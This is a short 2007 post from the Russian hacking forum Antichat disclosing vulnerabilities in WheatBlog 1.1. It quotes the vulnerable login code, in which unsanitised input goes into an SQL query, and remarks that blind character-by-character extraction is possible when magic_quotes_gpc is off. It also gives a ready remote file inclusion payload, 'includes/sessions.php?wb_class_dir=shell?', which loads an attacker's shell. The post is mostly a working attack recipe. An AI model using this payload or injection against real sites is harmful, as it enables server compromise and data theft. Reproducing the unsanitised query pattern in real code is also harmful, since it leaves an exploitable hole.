Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   WheatBlog 1.1 RFI/SQL Injection (https://forum.antichat.xyz/showthread.php?t=43422)

gemaglabin 30.06.2007 16:01
WheatBlog 1.1 RFI/SQL Injection
 
SQL иньекция в функции логина , но под чужим аккаунтом не залезть.Возможен посимвольный перебор при условии что magic_quotes_gpc = off

Код:
$sql = "select * from $tblUsers where login = '$login'";
if ( $login        != $row['login'] )        $valid_user = 0;
                if ( $password  != $row['password'] ) $valid_user = 0;
RFI
Код:
includes/sessions.php?wb_class_dir=shell?


Время: 00:39